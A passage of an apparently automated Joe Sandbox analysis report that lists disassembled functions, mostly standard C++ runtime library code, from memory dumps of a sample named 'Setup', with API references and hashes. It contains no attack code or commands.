std::_Lockit::_Lockit.LIBCPMT ref: 031DFDD5

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DFE26
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFE46
Concurrency::cancel_current_task.LIBCPMT ref: 031DFE53

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 454449e174fa506da87996b2b119ce649da0db0871324d1ceb71d207671f7cdd
Instruction ID: ce533849d78a654708a253b9d681d9f4783dbc559eebdf1cd233774d33bc0f20
Opcode Fuzzy Hash: 454449e174fa506da87996b2b119ce649da0db0871324d1ceb71d207671f7cdd
Instruction Fuzzy Hash: A101D23A9002199FCB05EBA8D9046BEB7B5AF8D310F194408D4116F281CFB49B92CB91

Function 031DFC05 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFC0C
std::_Lockit::_Lockit.LIBCPMT ref: 031DFC16

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DFC67
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFC87
Concurrency::cancel_current_task.LIBCPMT ref: 031DFC94

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: d7899e07415ad9c65a79fada8f9ab8b38eb843d9a87061b7b097e88c230b7d99
Instruction ID: c3bc29a31f1ebfef97e4bc65aa06080b1ce873fc38b806a58939de4dac25c76b
Opcode Fuzzy Hash: d7899e07415ad9c65a79fada8f9ab8b38eb843d9a87061b7b097e88c230b7d99
Instruction Fuzzy Hash: A201D23A9002199FCB04EBA8D904ABEB7F5AF4E710F184509D8116F280CF749B51C780

Function 031DFC9A Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DFCA1
std::_Lockit::_Lockit.LIBCPMT ref: 031DFCAB

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DFCFC
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFD1C
Concurrency::cancel_current_task.LIBCPMT ref: 031DFD29

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: aa9c01bdf47ddf1308b09f4eaae240d1b6598cd88afb558d1fe405c7e1f66e7d
Instruction ID: 464094e8d1be728d58d3be33dd471f660e2915d6dfe4fd5a812a592d724386bf
Opcode Fuzzy Hash: aa9c01bdf47ddf1308b09f4eaae240d1b6598cd88afb558d1fe405c7e1f66e7d
Instruction Fuzzy Hash: F901927E9007299BCB05EFA8E944ABEB7B5AF4D314F244509D4116F2C4CFB49B42CB91

Function 02D90EAC Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90EB3
std::_Lockit::_Lockit.LIBCPMT ref: 02D90EBD

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

messages.LIBCPMT ref: 02D90EF7
std::_Lockit::~_Lockit.LIBCPMT ref: 02D90F2E

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
String ID:
API String ID: 50917705-0
Opcode ID: 41e985dcc352a12e6511f4bf4fc4dc1ee543562b93d77d22cff0399aa39eb6fc
Instruction ID: 5f100ec3c47bc73782c489324da44bbefd6c9b3f5932b8797a0bbdff94714222
Opcode Fuzzy Hash: 41e985dcc352a12e6511f4bf4fc4dc1ee543562b93d77d22cff0399aa39eb6fc
Instruction Fuzzy Hash: 6FF0903191051A9BCF05FBA4C9507FEAA26EF40311F60451DE9116B3C0EF759E05CFA9

Function 02D90E17 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90E1E
std::_Lockit::_Lockit.LIBCPMT ref: 02D90E28

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

messages.LIBCPMT ref: 02D90E62
std::_Lockit::~_Lockit.LIBCPMT ref: 02D90E99

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
String ID:
API String ID: 50917705-0
Opcode ID: 40b3ce45862ae2d8e7a1c889a66e0f19b4db7ba76e28539dead66d5074972f5c
Instruction ID: 92acfb3ddd0394b243d48c3d4ae2c46b2be5d137332260699368c1a487014f1b
Opcode Fuzzy Hash: 40b3ce45862ae2d8e7a1c889a66e0f19b4db7ba76e28539dead66d5074972f5c
Instruction Fuzzy Hash: 2DF090319101169BCF05FBA4C9507FEA767EF40711F60451DEA106B3D0DF759E058BA5

Function 02D90D82 Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90D89
std::_Lockit::_Lockit.LIBCPMT ref: 02D90D93

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

ctype.LIBCPMT ref: 02D90DCD
std::_Lockit::~_Lockit.LIBCPMT ref: 02D90E04

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
String ID:
API String ID: 3358926169-0
Opcode ID: e4de731c418cf808acd8fc452002c8b80df09fbc584e5a272b0d8d4f801ea17c
Instruction ID: ad1f3f292faa7e3baa91f4ff49935320abe5d3d849de22246f22ff2cb0130bb4
Opcode Fuzzy Hash: e4de731c418cf808acd8fc452002c8b80df09fbc584e5a272b0d8d4f801ea17c
Instruction Fuzzy Hash: 56F090318101299BCF05FBA4C8606FE6726EF40726F64455DE9156B3C0DF759E01CBA5

Function 02DAAB39 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 02DAACB0

Strings

+, xrefs: 02DAAC0E
@PI, xrefs: 02DAAB3B
-, xrefs: 02DAAC01

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: +$-$@PI
API String ID: 3732870572-533401412
Opcode ID: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
Instruction ID: 27b45be36a19326df43a9f57a0b04db23b8eec2d82a8e4774fdc63803694f60b
Opcode Fuzzy Hash: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
Instruction Fuzzy Hash: 2BA1C074A41258AFDF25CE78C860BEE7BB1EF45225F088759E8A59B380E734DD05CB60

Function 02D6EB94 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D6ED5D

Strings

'@PI, xrefs: 02D6EBA1
@PI, xrefs: 02D6EBA4
@PI, xrefs: 02D6EB9A

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: '@PI$@PI$@PI
API String ID: 118556049-2151343152
Opcode ID: 48c302ca692bac963d9076bbf8a13df93fd460f2e454e7a46bfd9545355c367e
Instruction ID: 47bdb47601c458da5b0fe3fe2c14e8e1be1cb74041a877c537d28b8e46ab7974
Opcode Fuzzy Hash: 48c302ca692bac963d9076bbf8a13df93fd460f2e454e7a46bfd9545355c367e
Instruction Fuzzy Hash: C351A1B5A002059BCB24DF68D984A6AF7B5FF45304F10076EE855DB341E731EE94CBA1

Function 02D74B04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 02D74C2D

Strings

@PI, xrefs: 02D74B0A, 02D74B2C
@PI, xrefs: 02D74BC9
@PI, xrefs: 02D74C50

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: @PI$@PI$@PI
API String ID: 118556049-4240548292
Opcode ID: 9cd45673e87d235d763ef49a99a4cd8a0bb5bbdcf434c4d09dc661dc1ef61c72
Instruction ID: fd8d68c5c3157b46e3e171b700c3da48c4587882eec83d8a139821f656c21382
Opcode Fuzzy Hash: 9cd45673e87d235d763ef49a99a4cd8a0bb5bbdcf434c4d09dc661dc1ef61c72
Instruction Fuzzy Hash: 3341C2B2A006049BC7259F68D880B6EF7F9EB45321F24476AE965CB380E775DD00CBA1

Function 031F21BD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 031F21E2
CatchIt.LIBVCRUNTIME ref: 031F22C8

Strings

MOC, xrefs: 031F21F4
RCC, xrefs: 031F21FC

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 3e42ad482a925256479ace276cf548d225c561927617cafcae5a02eb86be886b
Instruction ID: f2196e03bff1cde79fa24caf2e49079c0a9fdb73757dd2bef08bf054216cac96
Opcode Fuzzy Hash: 3e42ad482a925256479ace276cf548d225c561927617cafcae5a02eb86be886b
Instruction Fuzzy Hash: 1041687A90020DEFDF16DF98CC80AAEBBB6BF0D300F188499EA046B250D335D951DB51

Function 02D9E221 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9E228
_Mpunct.LIBCPMT ref: 02D9E2C0
_Mpunct.LIBCPMT ref: 02D9E2DA

Strings

$+xv, xrefs: 02D9E2E5

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 9dbac6cf57a7859debba628e1a2665e756eb6bb81456cf880c9044b4d54274ca
Instruction ID: 11a823efef92150569538d6292500171947af1d1ebfd213ffb7a327dafb44d08
Opcode Fuzzy Hash: 9dbac6cf57a7859debba628e1a2665e756eb6bb81456cf880c9044b4d54274ca
Instruction Fuzzy Hash: CB218DB1904A526EDB25DF648850B6FBFF9EB09300F04895AE459C7B40D730EA05CFA0

Function 02D94AC2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D94AC9

Part of subcall function 02D8E2F5: _Maklocchr.LIBCPMT ref: 02D8E361
Part of subcall function 02D8E2F5: _Maklocchr.LIBCPMT ref: 02D8E374

_Mpunct.LIBCPMT ref: 02D94B61
_Mpunct.LIBCPMT ref: 02D94B7B

Strings

$+xv, xrefs: 02D94B86

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2606921204-1686923651
Opcode ID: e36d912d9294c4176ae1cc36afbe914f0d251cea8c1b0cdf24a6f49a31e69d2a
Instruction ID: 7d39038804a8a0784cb177071d0b1a8d102e55a430ccf63e611f9559d5a9f8cd
Opcode Fuzzy Hash: e36d912d9294c4176ae1cc36afbe914f0d251cea8c1b0cdf24a6f49a31e69d2a
Instruction Fuzzy Hash: 51219EB1804B526EDB25DF74C850B6BBBF9EB09304F044A5AE459C7B41D730EA06CFA0

Function 031E32DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031E32E5

Part of subcall function 031DCB11: _Maklocstr.LIBCPMT ref: 031DCB31
Part of subcall function 031DCB11: _Maklocstr.LIBCPMT ref: 031DCB4E
Part of subcall function 031DCB11: _Maklocstr.LIBCPMT ref: 031DCB6B
Part of subcall function 031DCB11: _Maklocchr.LIBCPMT ref: 031DCB7D
Part of subcall function 031DCB11: _Maklocchr.LIBCPMT ref: 031DCB90

_Mpunct.LIBCPMT ref: 031E337D
_Mpunct.LIBCPMT ref: 031E3397

Strings

$+xv, xrefs: 031E33A2

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: 9250336fbf4394809ccef60efe4cff28b06e56aa4f97eda8de8d355a763481d2
Instruction ID: 793f871ecb40a6b2baa8416254fd96cca20a7c87a080a256ec38ac26ba75a2b0
Opcode Fuzzy Hash: 9250336fbf4394809ccef60efe4cff28b06e56aa4f97eda8de8d355a763481d2
Instruction Fuzzy Hash: A22191B5904B556FDB25DF74C880B6BBBF8AB0D700F084A1AE569CBA40DB70E651CB90

Function 02D59B04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 02D59BAD

Strings

@vH, xrefs: 02D59B3B
XvH, xrefs: 02D59B45
pvH, xrefs: 02D59B4A

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: @vH$XvH$pvH
API String ID: 323602529-2179960064
Opcode ID: 2d6f2e9fcaddc223df7d48f976578ba98bb26607490a197f35c673da3c32ec7b
Instruction ID: ae17aa6b6e742226692a652877a0dadedd66aec04b52a8e39cc0bae9a1c063f4
Opcode Fuzzy Hash: 2d6f2e9fcaddc223df7d48f976578ba98bb26607490a197f35c673da3c32ec7b
Instruction Fuzzy Hash: D011E9B2908A58ABDF10DE588851FE973D8E704320F14866AFD6997380F779DD00CBE5

Function 031A8320 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 031A83C9

Part of subcall function 031EF9CE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,031A66AC,?,?,?,?,031A66AC,?,0323384C), ref: 031EFA2E

Strings

ios_base::badbit set, xrefs: 031A8357, 031A8382
ios_base::failbit set, xrefs: 031A8361
ios_base::eofbit set, xrefs: 031A8366

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: DispatcherExceptionIos_base_dtorUserstd::ios_base::_
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2705359024-1866435925
Opcode ID: f56b7c2fff64987934bbf5d49f72f51cca0967d35c3cf2ab7d81c70b4ac7ea0b
Instruction ID: 8811b80f8247c0a94898517c6ae7de7f02f86072bf0d04ccf3b426285b6dda90
Opcode Fuzzy Hash: f56b7c2fff64987934bbf5d49f72f51cca0967d35c3cf2ab7d81c70b4ac7ea0b
Instruction Fuzzy Hash: AB115EB6914B04BFC714EE6CDC01BEA77D8EB0D611F044669FD588B181E735D90087D1

Function 032025C8 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(03235040,00000000,00000000,?), ref: 0320262B

Part of subcall function 032092FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,032081B3,?,00000000,-00000008), ref: 0320935F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0320287D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 032028C3
GetLastError.KERNEL32 ref: 03202966

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: d5b2f574fef83791dcac75b005634b523f83e1f46c81d0466ae0d193780c37bb
Instruction ID: 08067e9d43f38dc571c1040b964e9d093eaa7a7b7e0957ffefe681e4b70bf340
Opcode Fuzzy Hash: d5b2f574fef83791dcac75b005634b523f83e1f46c81d0466ae0d193780c37bb
Instruction Fuzzy Hash: DED1AE75D10248DFCB15CFA8D888AADFBB5FF09310F28456AE855EB392D730A985CB50

Function 031BC590 Relevance: 6.3, APIs: 4, Instructions: 298COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 031BC75F
___std_exception_destroy.LIBVCRUNTIME ref: 031BC779
___std_exception_destroy.LIBVCRUNTIME ref: 031BC9A6
___std_exception_destroy.LIBVCRUNTIME ref: 031BC9C0

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ___std_exception_destroy
String ID:
API String ID: 4194217158-0
Opcode ID: bea537a9db0e379db65a0817857c970744e97c3f11f1c8eafae2161a7aedb6dd
Instruction ID: f3fd43e43168b79bc51fd512763fa716b3f3844e3dc64f2ad0eac4122a34429e
Opcode Fuzzy Hash: bea537a9db0e379db65a0817857c970744e97c3f11f1c8eafae2161a7aedb6dd
Instruction Fuzzy Hash: B0E11374905398DFDB24DB64C954BDEFBB4AF19300F1481D9D449AB281EB706B88CFA2

Function 02DA33A5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 02DA346C
___AdjustPointer.LIBCMT ref: 02DA348F
___AdjustPointer.LIBCMT ref: 02DA352B

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0c94a2b4f76303ae540389fc1941a9e068f80556927b55d9d9a5e8451eaa1ea6
Instruction ID: 8c2cb550e97a978d8a5bf5ecfb28055041816d6edefbae0e4fb97e5c41112716
Opcode Fuzzy Hash: 0c94a2b4f76303ae540389fc1941a9e068f80556927b55d9d9a5e8451eaa1ea6
Instruction Fuzzy Hash: 3551F372600702AFDB6A8F54D860FBAB7B6EF04714F1445ADD846477A0E7B1EC40CBA0

Function 031F1BC1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 031F1C88
___AdjustPointer.LIBCMT ref: 031F1CAB
___AdjustPointer.LIBCMT ref: 031F1D47

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5ee7651634373047a2292057f4d700e5faa5b80341d7fc5ea21efdb45356492f
Instruction ID: ba87983a21803db4ba635c17252e3a565ef35e6f761ecd204d84febae7ec1d83
Opcode Fuzzy Hash: 5ee7651634373047a2292057f4d700e5faa5b80341d7fc5ea21efdb45356492f
Instruction Fuzzy Hash: 2E51C2B6600706FFDB29DF51D851BBAB7A8FF4C710F194539EE158A190E732A882C790

Function 02DB5E7B Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf9403094a09c213dd7f70900c1e2b38e6d2512992a67aba0aecdf4ecfa4432d
Instruction ID: 93cc1ae87ae2feb19e87cd732208a59968faccb86eb61bdb51eb1199cdd22ec1
Opcode Fuzzy Hash: bf9403094a09c213dd7f70900c1e2b38e6d2512992a67aba0aecdf4ecfa4432d
Instruction Fuzzy Hash: 0441E476A00704EFE715AF78D854BAABBEAEF48710F50852AE046DB780D771AD40CB90

Function 03204697 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a539f88020ec866de3fa2f8e66ecd18967e03f2523c83469f441a0efbf3a8c5
Instruction ID: 02cc35072fa232e8ddbc13c81aa5b2802521e40712d7079e78e8414c4dea5981
Opcode Fuzzy Hash: 5a539f88020ec866de3fa2f8e66ecd18967e03f2523c83469f441a0efbf3a8c5
Instruction Fuzzy Hash: 7441FBB9A10705EFD724EF39CC40B5ABBE9EB49710F108639E201DF6D1D7B1A5848B80

Function 032082A8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 032092FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,032081B3,?,00000000,-00000008), ref: 0320935F

GetLastError.KERNEL32 ref: 0320830C
__dosmaperr.LIBCMT ref: 03208313
GetLastError.KERNEL32(?,?,?,?), ref: 0320834D
__dosmaperr.LIBCMT ref: 03208354

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 83a62f4c1faa2373b84765d4d7efe4ccee413c0c5872fad7844530e6ef8a1775
Instruction ID: e7da47e0ee89c5c67f83f78cb41743058e1ba49aa1d48171d9825254315f7d28
Opcode Fuzzy Hash: 83a62f4c1faa2373b84765d4d7efe4ccee413c0c5872fad7844530e6ef8a1775
Instruction Fuzzy Hash: BF217635620316EFCB10EF76C88097BB7ADFF482607048428F919DB181DB70EC948B90

Function 02D94CED Relevance: 6.1, APIs: 4, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 02D94CF4
_Maklocchr.LIBCPMT ref: 02D94D87
_Maklocchr.LIBCPMT ref: 02D94D97
_Getvals.LIBCPMT ref: 02D94DB9

Part of subcall function 02D8E387: _Maklocchr.LIBCPMT ref: 02D8E3B6
Part of subcall function 02D8E387: _Maklocchr.LIBCPMT ref: 02D8E3CC

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Maklocchr$GetvalsH_prolog3_
String ID:
API String ID: 402987911-0
Opcode ID: ccaef6109f0c38270a8ea9ae5b9ba65526872207bb84f82b9a6c9f5965ec12e2
Instruction ID: a67e94654837e5030186307fb7954b6954a8b2ee98f8b1b97b9014c7b57139a7
Opcode Fuzzy Hash: ccaef6109f0c38270a8ea9ae5b9ba65526872207bb84f82b9a6c9f5965ec12e2
Instruction Fuzzy Hash: 14216B72D00218AADF15FFA4D884ADE7BB9EF04710F10845AB9049F285EB70C905CFB1

Function 032093A1 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 032093A9

Part of subcall function 032092FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,032081B3,?,00000000,-00000008), ref: 0320935F

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 032093E1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 03209401

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 8542d1b3006b0e19720e94950141f44e2be3977ed5a4a084e449b9a2feadbd90
Instruction ID: a8af4fb8e0f2d0ce3fdc901270e8d74ec66adbedfce6964d4d4d7ee6b07fba73
Opcode Fuzzy Hash: 8542d1b3006b0e19720e94950141f44e2be3977ed5a4a084e449b9a2feadbd90
Instruction Fuzzy Hash: 3C1121B9521216BFA715ABB16DCCC6F296CDEA40947004020F907A6193EBA0CDC841B1

Function 03203E5A Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,03235040,?,03203F69,?,?,00000000,?), ref: 03203F1B

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: a77da4b8169abe28a6fefd7716bd395416416a028576acdfe3d26496e6b233f6
Instruction ID: bebc07bf9e73698c4b89d6fc93d766d3adf92916a033fb777a9f4dbea3a8cb0d
Opcode Fuzzy Hash: a77da4b8169abe28a6fefd7716bd395416416a028576acdfe3d26496e6b233f6
Instruction Fuzzy Hash: 1221303AA54211FBC731EB64EC48A5E7778AF517A0F180721EA15A71C2D770ED4CC6D0

Function 031CE1A0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

